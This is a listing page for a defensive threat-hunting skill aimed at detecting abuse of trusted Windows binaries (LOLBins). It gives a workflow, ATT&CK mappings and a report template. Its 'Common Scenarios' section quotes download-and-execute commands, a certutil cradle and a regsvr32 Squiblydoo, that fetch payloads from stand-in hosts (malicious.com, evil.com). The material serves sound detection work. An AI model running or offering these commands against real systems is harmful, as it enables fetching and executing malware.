
Hunting for Living-off-the-Land Binaries
FreeProactively detect malicious use of trusted system binaries.
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What Hunting for Living-off-the-Land Binaries does
The Hunting for Living-off-the-Land Binaries skill provides a structured approach to identify and mitigate the abuse of legitimate system binaries (LOLBins) that adversaries exploit to execute malicious actions. This skill is particularly useful for security professionals engaged in threat hunting and incident response, as it allows them to proactively seek out instances where trusted binaries are misused to evade detection by traditional security measures. By leveraging telemetry from Endpoint Detection and Response (EDR) systems and Security Information and Event Management (SIEM) tools, users can gain insights into potentially malicious activities occurring within their environments.
The workflow begins with defining a hypothesis based on threat intelligence, followed by identifying target LOLBins from the LOLBAS Project. Users collect process telemetry and establish baselines for normal behavior of these binaries, enabling them to spot anomalies that may indicate malicious activity. The skill emphasizes the importance of correlating findings with network logs and other data sources to enrich the context of detected anomalies, thus improving the accuracy of threat detection.
This skill is designed for security analysts, incident responders, and threat hunters who are familiar with the concepts of LOLBins and the MITRE ATT&CK framework. It requires access to EDR telemetry and SIEM logs, as well as an understanding of how to interpret process creation events and command-line arguments. By following the outlined workflow, users can enhance their detection capabilities and better defend against sophisticated attacks that utilize trusted binaries for malicious purposes.
In addition to its practical applications in threat hunting, this skill also serves as a valuable resource for red team and purple team exercises, allowing teams to validate their detection coverage against known techniques for LOLBin abuse. The structured approach provided by this skill ensures that users can systematically hunt for and document findings related to LOLBin exploitation, ultimately improving their organization's security posture.
When to use it
Use this skill during proactive threat hunts, especially when investigating fileless malware or when EDR alerts indicate unusual behavior involving trusted binaries.
When not to use it
This skill may not be suitable for environments without EDR telemetry or SIEM logs, as it relies heavily on these data sources for effective analysis.
What you can build with it
Investigating Fileless Malware
Use this skill to hunt for indicators of fileless malware campaigns that bypass traditional antivirus solutions.
Proactive Threat Hunting
Engage in proactive threat hunting when EDR alerts indicate unusual behavior with legitimate binaries.
Red Team Exercises
Utilize this skill during red team exercises to validate detection coverage against LOLBin exploitation techniques.
How to install Hunting for Living-off-the-Land Binaries
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Inside SKILL.md
Written by mukul975Hunting for Living-off-the-Land Binaries (LOLBins)
When to Use
- When investigating fileless malware campaigns that bypass traditional AV
- During proactive threat hunts targeting defense evasion techniques
- When EDR alerts fire on legitimate binaries executing unusual child processes
- After threat intelligence reports indicate LOLBin abuse in active campaigns
- During red team/purple team exercises validating detection coverage for T1218
Prerequisites
- Access to EDR telemetry (CrowdStrike, Microsoft Defender for Endpoint, SentinelOne)
- SIEM with process creation logs (Sysmon Event ID 1, Windows Security 4688)
- Familiarity with LOLBAS Project (lolbas-project.github.io) reference list
- PowerShell command-line logging enabled (Module Logging, Script Block Logging)
- Network proxy or firewall logs for correlating outbound connections
Workflow
- Define Hunt Hypothesis: Formulate a hypothesis based on threat intel (e.g., "Adversaries are using certutil.exe to download second-stage payloads from external domains").
- Identify Target LOLBins: Select specific binaries from the LOLBAS Project database to hunt for, prioritizing those matching current threat landscape (certutil, mshta, rundll32, regsvr32, msiexec, wmic, cmstp, bitsadmin).
- Collect Process Telemetry: Query EDR or SIEM for process creation events involving target LOLBins with unusual command-line arguments, parent processes, or execution contexts.
- Baseline Normal Behavior: Establish what legitimate usage looks like for each LOLBin in your environment by analyzing historical frequency, typical parent processes, and standard arguments.
- Identify Anomalies: Compare current telemetry against baselines, flagging executions with network connections, encoded commands, unusual file paths, or abnormal parent-child process chains.
- Correlate and Enrich: Cross-reference anomalous LOLBin activity with network logs, DNS queries, file creation events, and threat intelligence feeds.
- Document and Report: Record findings, update detection rules, and create IOC lists for identified malicious LOLBin usage.
Key Concepts
| Concept | Description |
|---|---|
| LOLBin | Legitimate OS binary abused by attackers for malicious purposes |
| LOLBAS Project | Community-curated list of Windows LOLBins, LOLLibs, and LOLScripts |
| T1218 | MITRE ATT&CK - Signed Binary Proxy Execution |
| T1218.001 | Compiled HTML File (mshta.exe) |
| T1218.002 | Control Panel (control.exe) |
| T1218.003 | CMSTP |
| T1218.005 | Mshta |
| T1218.010 | Regsvr32 |
| T1218.011 | Rundll32 |
| T1197 | BITS Jobs (bitsadmin.exe) |
| T1140 | Deobfuscate/Decode Files (certutil.exe) |
| Proxy Execution | Using trusted binaries to execute untrusted code |
| Fileless Attack | Attack that operates primarily in memory without dropping files |
Tools & Systems
| Tool | Purpose |
|---|---|
| CrowdStrike Falcon | EDR telemetry and process tree analysis |
| Microsoft Defender for Endpoint | Advanced hunting with KQL queries |
| Splunk | SIEM log aggregation and SPL queries |
| Elastic Security | Detection rules and timeline investigation |
| Sysmon | Detailed process creation and network logging |
| LOLBAS Project | Reference database of LOLBin capabilities |
| Sigma Rules | Generic detection rule format for LOLBins |
| Velociraptor | Endpoint forensic collection and hunting |
Common Scenarios
- Certutil Download Cradle: Adversary uses
certutil.exe -urlcache -split -f http://malicious.com/payload.exeto download malware, bypassing web proxies that allow certutil traffic. - Mshta HTA Execution: Attacker delivers HTA file via email that executes VBScript payload through
mshta.exe, which is a signed Microsoft binary. - Rundll32 DLL Proxy Load: Malicious DLL loaded via
rundll32.exe shell32.dll,ShellExec_RunDLLto proxy execution through a trusted binary. - Regsvr32 Squiblydoo: Remote SCT file executed via
regsvr32 /s /n /u /i:http://evil.com/file.sct scrobj.dllbypassing application whitelisting. - BITSAdmin Persistence: Adversary creates BITS transfer job to repeatedly download and execute payloads using
bitsadmin /transfer.
Output Format
Hunt ID: TH-LOLBIN-[DATE]-[SEQ]
Hypothesis: [Stated hypothesis]
LOLBins Investigated: [List of binaries]
Time Range: [Start] - [End]
Data Sources: [EDR, Sysmon, SIEM]
Findings:
- [Finding 1 with evidence]
- [Finding 2 with evidence]
Anomalies Detected: [Count]
True Positives: [Count]
False Positives: [Count]
IOCs Identified: [List]
Detection Rules Created/Updated: [List]
Recommendations: [Next steps]
Frequently asked questions about Hunting for Living-off-the-Land Binaries
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